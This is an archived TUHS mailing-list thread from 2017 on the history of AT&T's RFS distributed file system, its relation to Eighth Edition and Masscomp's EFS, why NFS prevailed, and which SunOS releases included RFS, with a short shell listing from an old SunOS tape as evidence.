From: Kevin Bowling @ 2017-09-27 23:01 UTC (permalink / raw)


RFS was long out by the time I started using *nix.  I do have media
for it for the 3B2s in my computer collection though.

What were the market forces or limitations that led to NFS prevailing?

Regards,

On Wed, Sep 27, 2017 at 1:44 AM,  <arnold at skeeve.com> wrote:
> Clem Cole <clemc at ccc.com> wrote:
>
>> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net> wrote:
>>
>> > Where does RFS (AT&T System III) fit in all of this?
>> >
>> Well it was not in PWB 3.0 - aka System III.
>
> It was in System V Release 3, thus the confusion.  Sun integrated it
> into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> was for sure gone from 4.1.3 and 4.1.4.
>
>> > Just looking for history on RFS if any.
>> >
>> David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta
>> afterwards.
>
> Interesting!  I never knew that he was involved with it. I don't think
> his name was on any of the USENIX papers.
>
> He and I grew up on the same street, and both sets of parents still
> live there.  He later (with Perry Flinn) went on to found Secureware
> and they did quite well for themselves in the 90s.
>
>> RFS was based on ideas Peter had used in Eighth Edition file system.  When
>> we did EFS @ Masscomp, Perry Flinn and I were both aware of Peter's work ...
>
> I briefly overlapped Perry at Georgia Tech. He was one of the three
> major developers of the Georgia Tech Software Tools Subsystem for Pr1me
> Computers that I later was involved with.  A very bright guy; no idea
> where he is now.
>
> Arnold
>



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27  8:44                 ` arnold
  2017-09-27 15:25                   ` Arthur Krewat
@ 2017-09-27 17:38                   ` Mantas Mikulėnas
  2017-09-27 23:01                   ` Kevin Bowling
  2 siblings, 0 replies; 48+ messages in thread
From: Mantas Mikulėnas @ 2017-09-27 17:38 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1026 bytes --]

On Wed, Sep 27, 2017 at 11:44 AM, <arnold at skeeve.com> wrote:

> Clem Cole <clemc at ccc.com> wrote:
>
> > On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net>
> wrote:
> >
> > > Where does RFS (AT&T System III) fit in all of this?
> > >
> > Well it was not in PWB 3.0 - aka System III.
>
> It was in System V Release 3, thus the confusion.  Sun integrated it
> into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> was for sure gone from 4.1.3 and 4.1.4.
>

...and to this day, even the Linux errno.h carries such gems as EDOTDOT,
described as "RFS specific error"...

Speaking of which, I've been meaning to ask – what was the original meaning
of such errnos as EL2HLT or ENOANO? (And, well, the remaining few dozen of
them?) I've figured out a few, but gave up on some.

-- 
Mantas Mikulėnas <grawity at gmail.com>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170927/474133e0/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 15:25                   ` Arthur Krewat
@ 2017-09-27 15:49                     ` arnold
  0 siblings, 0 replies; 48+ messages in thread
From: arnold @ 2017-09-27 15:49 UTC (permalink / raw)


Arthur Krewat <krewat at kilonet.net> wrote:

> On 9/27/2017 4:44 AM, arnold at skeeve.com wrote:
> > It was in System V Release 3, thus the confusion.  Sun integrated it
> > into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> > was for sure gone from 4.1.3 and 4.1.4.
>
> Not true, sorry ;)

You're right. It was in some version of Solaris 5.x that they dropped it.

It was so looooong ago ...

Thanks,

Arnold



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27  8:44                 ` arnold
@ 2017-09-27 15:25                   ` Arthur Krewat
  2017-09-27 15:49                     ` arnold
  2017-09-27 17:38                   ` Mantas Mikulėnas
  2017-09-27 23:01                   ` Kevin Bowling
  2 siblings, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-27 15:25 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1743 bytes --]



On 9/27/2017 4:44 AM, arnold at skeeve.com wrote:
> Clem Cole <clemc at ccc.com> wrote:
>
>>
>> Well it was not in PWB 3.0 - aka System III.
> It was in System V Release 3, thus the confusion.  Sun integrated it
> into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> was for sure gone from 4.1.3 and 4.1.4.
>

Not true, sorry ;) The host irises was my SunOS machine that I used for 
USENET news because it had 1GB SCSI disk on it. The host kilowatt was 
the modem front-end for my BBS and did all the UUCP processing. I was 
...!mcdhup!kilowatt in the early 90's.

RFS was included with SunOS 4.1.3 that I installed on irises. See below, 
motd shows SunOS release, and /usr/etc/mount* are all dated the same 
day, so it was installed from the SunOS 4.1.3 distribution at the time 
of initial install.

 From my archives:

medusa# pwd
/export/archive/tapes/irises.3/a2
medusa# cat etc/motd
SunOS Release 4.1.3 (IRISES) #4: Sun Mar 6 15:14:38 EST 1994

This is irises, a sister to kilowatt. It is a Sun Sparc IPC. I hope to
move to this platform in the near future, but for now, it has to be a
conglomerate.

medusa# ls -l usr/etc/mount*
-rwxr-xr-x   1 root     staff     163840 Jul 23  1992 usr/etc/mount
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_hsfs
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_lo
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_pcfs
-rwxr-xr-x   1 root     staff      65814 Jul 23  1992 usr/etc/mount_rfs
-rwxr-xr-x   1 root     staff      57344 Jul 23  1992 usr/etc/mount_tfs
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_tmp



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 19:54               ` Clem Cole
  2017-09-24 21:59                 ` Arthur Krewat
  2017-09-24 22:08                 ` Arthur Krewat
@ 2017-09-27  8:44                 ` arnold
  2017-09-27 15:25                   ` Arthur Krewat
                                     ` (2 more replies)
  2 siblings, 3 replies; 48+ messages in thread
From: arnold @ 2017-09-27  8:44 UTC (permalink / raw)


Clem Cole <clemc at ccc.com> wrote:

> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net> wrote:
>
> > Where does RFS (AT&T System III) fit in all of this?
> >
> Well it was not in PWB 3.0 - aka System III.

It was in System V Release 3, thus the confusion.  Sun integrated it
into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
was for sure gone from 4.1.3 and 4.1.4.

> > Just looking for history on RFS if any.
> >
> David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta
> afterwards.

Interesting!  I never knew that he was involved with it. I don't think
his name was on any of the USENIX papers.

He and I grew up on the same street, and both sets of parents still
live there.  He later (with Perry Flinn) went on to found Secureware
and they did quite well for themselves in the 90s.

> RFS was based on ideas Peter had used in Eighth Edition file system.  When
> we did EFS @ Masscomp, Perry Flinn and I were both aware of Peter's work ...

I briefly overlapped Perry at Georgia Tech. He was one of the three
major developers of the Georgia Tech Software Tools Subsystem for Pr1me
Computers that I later was involved with.  A very bright guy; no idea
where he is now.

Arnold



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 22:08                 ` Arthur Krewat
@ 2017-09-24 23:52                   ` Clem Cole
  0 siblings, 0 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-24 23:52 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 491 bytes --]

On Sun, Sep 24, 2017 at 6:08 PM, Arthur Krewat <krewat at kilonet.net> wrote:

> Also, Clem when you say "function shipping" - that sounds like RPC.
>

​Similar -- I think of  function shipping are the technique of sending
computation to the data rather than marshaling together/bringing the data
to the computation.
 ​
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/a0765107/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 19:54               ` Clem Cole
  2017-09-24 21:59                 ` Arthur Krewat
@ 2017-09-24 22:08                 ` Arthur Krewat
  2017-09-24 23:52                   ` Clem Cole
  2017-09-27  8:44                 ` arnold
  2 siblings, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-24 22:08 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 3077 bytes --]

Also, Clem when you say "function shipping" - that sounds like RPC.



On 9/24/2017 3:54 PM, Clem Cole wrote:
>
>
> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net 
> <mailto:krewat at kilonet.net>> wrote:
>
>     Where does RFS (AT&T System III) fit in all of this?
>
> ​Well it was not in PWB 3.0 - aka System ​III.
>
>
>
>     ​....
>
>
>     Just looking for history on RFS if any.
>
> David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta​ 
> afterwards.  IIRC Summit pushed it out via System V, it was not part 
> of System III (David did not even work for BTL when System II was 
> released).
>
> RFS was based on ideas Peter had used in Eighth Edition file system. 
> When we did EFS @ Masscomp,Perry Flinn and I were both aware of 
> Peter's work (I had talked to him a few times).  As we finished it, we 
> hired Dave in Atlanta and told me about us a little about RFS although 
> it had not yet been released.   If you look, my EFS paper was the 
> alternate paper given against Rusty's when the NFS paper published - 
> difference - Masscomp would not give away EFS - different story].
>
> Anyway, Dave's RFS used Peter's file system switch that was in 
> Eighth Edition.  I used something similar for EFS. Which was not as 
> clean as Steve Klieman's VFS layer; which I think Sun did right.   But 
> NFS got the whole stateless thing wrong which I was pleased over the 
> years to see I was right (the whole point of the EFS paper was if it's 
> a real UNIX file system, then their will be shared state and its how 
> do you recover from an error).
>
> RFS, EFS and Weinberger's FS all did stateful recovery.  RFS used a 
> function ship model IIRC.  I did not get to look at the code until 
> long after it was released so I never studied it in detail and I never 
> ran it.   But he had Peter's work available to him, so I suspect there 
> is a lot common ideas.  I think Peter used function shipping also.   
>  [EFS did not, it was more ad hoc as what we shipped and what we did 
> not.   That was a performance thing for us as we had Apollo down the 
> street and were very, very concerned with what Ageis/Domain could do].
>
> That said, NFS had a really simple model, which (in practice) was good 
> enough for many things and more importantly, Sun gave the code away 
> and made it a standard.  So the old less is more; Christensen 
> disruption theory of technology came through.
>
> Masscomp (and Apollo with Domain) both had 'better' distributed file 
> systems, but 'lost' because (like DEC were many of their people - 
> particularly in marketing - came) - did not get it.   Tried to keep to 
> closed like VMS et al... and it ultimately died.  NFS was 'free' and 
> did the job.   What was there not to like.
>
> In hindsight, I wish I could have understood that then.  Cudo's the 
> Kleiman for what he did!
>
> Clem

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/9243054a/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 19:54               ` Clem Cole
@ 2017-09-24 21:59                 ` Arthur Krewat
  2017-09-24 22:08                 ` Arthur Krewat
  2017-09-27  8:44                 ` arnold
  2 siblings, 0 replies; 48+ messages in thread
From: Arthur Krewat @ 2017-09-24 21:59 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 564 bytes --]



On 9/24/2017 3:54 PM, Clem Cole wrote:
>
>
> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net 
> <mailto:krewat at kilonet.net>> wrote:
>
>     Where does RFS (AT&T System III) fit in all of this?
>
> ​Well it was not in PWB 3.0 - aka System ​III.
>

Sorry, Clem, it was System V R3 - I read this, and then misspoke: 
https://en.wikipedia.org/wiki/Remote_File_Sharing


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/defe4bce/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 17:51             ` [TUHS] RFS was: " Arthur Krewat
@ 2017-09-24 19:54               ` Clem Cole
  2017-09-24 21:59                 ` Arthur Krewat
                                   ` (2 more replies)
  0 siblings, 3 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-24 19:54 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 2784 bytes --]

On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net> wrote:

> Where does RFS (AT&T System III) fit in all of this?
>
​Well it was not in PWB 3.0 - aka System ​III.




>
> ​....
>
>
> Just looking for history on RFS if any.
>
David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta​
afterwards.  IIRC Summit pushed it out via System V, it was not part of
System III (David did not even work for BTL when System II was released).

RFS was based on ideas Peter had used in Eighth Edition file system.  When
we did EFS @ Masscomp, Perry Flinn and I were both aware of Peter's work (I
had talked to him a few times).  As we finished it, we hired Dave in
Atlanta and told me about us a little about RFS although it had not yet
been released.   If you look, my EFS paper was the alternate paper given
against Rusty's when the NFS paper published - difference - Masscomp would
not give away EFS - different story].

Anyway, Dave's RFS used Peter's file system switch that was in
Eighth Edition.  I used something similar for EFS.   Which was not as clean
as Steve Klieman's VFS layer; which I think Sun did right.   But NFS got
the whole stateless thing wrong which I was pleased over the years to see I
was right (the whole point of the EFS paper was if it's a real UNIX file
system, then their will be shared state and its how do you recover from an
error).

RFS, EFS and Weinberger's FS all did stateful recovery.  RFS used a
function ship model IIRC.  I did not get to look at the code until long
after it was released so I never studied it in detail and I never ran it.
But he had Peter's work available to him, so I suspect there is a lot
common ideas.  I think Peter used function shipping also.    [EFS did not,
it was more ad hoc as what we shipped and what we did not.   That was a
performance thing for us as we had Apollo down the street and were very,
very concerned with what Ageis/Domain could do].

That said, NFS had a really simple model, which (in practice) was good
enough for many things and more importantly, Sun gave the code away and
made it a standard.  So the old less is more; Christensen disruption theory
of technology came through.

Masscomp (and Apollo with Domain) both had 'better' distributed file
systems, but 'lost' because (like DEC were many of their people -
particularly in marketing - came) - did not get it.   Tried to keep to
closed like VMS et al... and it ultimately died.  NFS was 'free' and did
the job.   What was there not to like.

In hindsight, I wish I could have understood that then.  Cudo's the Kleiman
for what he did!

Clem
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/b59b4cb6/attachment-0001.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re:  UNIX of choice these days?
  2017-09-24 17:33           ` Clem Cole
@ 2017-09-24 17:51             ` Arthur Krewat
  2017-09-24 19:54               ` Clem Cole
  0 siblings, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-24 17:51 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1835 bytes --]

Where does RFS (AT&T System III) fit in all of this?

I used it for a while between a SunOS 4.1.3 box and a PC running AT&T 
SVR4.2 (Consensys) because the client-side NFS was buggy on the SVR4.2 
side. This was in the days when I ran a UUCP node (kilowatt) in the 
early 90's and needed access from the PC to the "large" (5.25" FH 1GB) 
disk on the SunOS machine. It worked, that I can say.

Eventually, I swapped it around after getting an Adaptec SCSI controller 
for the PC - turned out the server-side NFS on this particular SVR4.2 
was fine.

Just looking for history on RFS if any.

thanks!

On 9/24/2017 1:33 PM, Clem Cole wrote:
>
> ​To me, the really important thing SMI did by giving away NFS, was to 
> start the FS laying argument.   What we ended up with is not perfect, 
> its a compromise (I wish the stacking model was better), but we 
> started to have the discussion.​   But because of NFS, we ended up 
> getting a lot of different file system options; which previously we 
> did not have.   It made us really think through what were 'meta' 
> functions that were FS independant, 'virtual' functions what span all 
> FS implementasions, and what were 'physical' (implementation) specific 
> file system functions.
>
> NFS really should be credited for forcing that clean up.
>
> Similarly, a few of us tried (and failed) to have the process layer 
> discussion -- consider the Locus vprocs work.   It's really too bad, 
> we don't have that layer in any of the UNIX kernels today, it really 
> make process control, migration, etc a lot cleaner; just as adding a 
> file system layer did.
>
> But that's a war, I fought and lost....
>
>
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/feb02688/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

end of thread, other threads:[~2017-09-29 22:21 UTC | newest]

Thread overview: 48+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2017-09-28 12:53 [TUHS] RFS was: Re: UNIX of choice these days? Noel Chiappa
2017-09-28 14:09 ` Theodore Ts'o
2017-09-28 14:35   ` Clem Cole
     [not found] <mailman.1219.1506559196.3779.tuhs@minnie.tuhs.org>
2017-09-28 14:08 ` David
2017-09-28 17:22   ` Pete Wright
  -- strict thread matches above, loose matches on Subject: below --
2017-09-20  0:12 [TUHS] " Arthur Krewat
2017-09-20  0:39 ` Dave Horsfall
2017-09-23  9:17   ` Dario Niedermann
2017-09-23  9:36     ` Steve Mynott
2017-09-24 13:46       ` Andy Kosela
2017-09-24 14:02         ` ron minnich
2017-09-24 17:33           ` Clem Cole
2017-09-24 17:51             ` [TUHS] RFS was: " Arthur Krewat
2017-09-24 19:54               ` Clem Cole
2017-09-24 21:59                 ` Arthur Krewat
2017-09-24 22:08                 ` Arthur Krewat
2017-09-24 23:52                   ` Clem Cole
2017-09-27  8:44                 ` arnold
2017-09-27 15:25                   ` Arthur Krewat
2017-09-27 15:49                     ` arnold
2017-09-27 17:38                   ` Mantas Mikulėnas
2017-09-27 23:01                   ` Kevin Bowling
2017-09-27 23:11                     ` Clem Cole
2017-09-27 23:13                       ` Kevin Bowling
2017-09-28  0:39                         ` Larry McVoy
2017-09-28  3:19                           ` Theodore Ts'o
2017-09-28 13:45                             ` Larry McVoy
2017-09-28 17:12                               ` Steve Johnson
2017-09-28  0:54                         ` Dave Horsfall
2017-09-28  0:59                           ` William Pechter
2017-09-28 13:49                         ` arnold
2017-09-28 14:07                           ` Larry McVoy
2017-09-28 14:28                             ` arnold
2017-09-28 19:49                               ` Larry McVoy
2017-09-28 20:00                             ` Bakul Shah
2017-09-28 14:27                           ` Clem Cole
2017-09-28 22:08                             ` Dave Horsfall
2017-09-28 22:20                               ` Larry McVoy
2017-09-29  2:23                                 ` Kevin Bowling
2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
2017-09-29 14:20                                   ` Clem Cole
2017-09-29 16:46                                   ` Grant Taylor
2017-09-29 17:02                                     ` Kurt H Maier
2017-09-29 17:27                                       ` Pete Wright
2017-09-29 18:11                                       ` Grant Taylor
2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
2017-09-29 15:22                                 ` George Ross
2017-09-29 18:40                                   ` Don Hopkins
2017-09-29 19:03                                     ` Larry McVoy
2017-09-29 21:24                                     ` Arthur Krewat
2017-09-29 22:11                                       ` Don Hopkins
2017-09-29 22:21                                         ` Don Hopkins
2017-09-29 19:19                                 ` Dan Cross
2017-09-29 19:22                                   ` Larry McVoy
2017-09-29 20:52                                   ` Jon Forrest

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).